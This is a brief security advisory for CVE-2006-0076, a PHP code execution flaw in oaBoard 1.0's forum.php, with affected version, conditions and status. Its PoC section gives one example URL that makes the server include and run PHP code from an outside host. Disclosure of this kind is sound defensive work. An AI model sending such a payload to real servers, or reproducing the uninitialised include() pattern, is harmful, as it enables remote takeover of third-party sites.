PHP Code Execution in oaBoard
Summary
- Vulnerability
- PHP Code Execution in oaBoard
- Discovered
- 2005.12.29
- Last Update
- 0 n/a
- ID
- EV0003
- CVE
- CVE-2006-0076
- Risk Level
- high
- Type
- PHP Code Execution
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- oaBoard
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
PHP Code Execution found in oaBoard script.
Vulnerable scripts:
forum.php
Variables $inc and $inc_stat isn't initialized before being used in the include(). This can be used to execute arbitrary PHP code.
Condition: register_globals = on
PoC/Exploit
Example URL:
http://host/oaboard_en/forum.php? inc=http://anotherhost/code.php
Solution.
Solution for "PHP Code Execution in oaBoard" is not available. Check vendor's website for updates.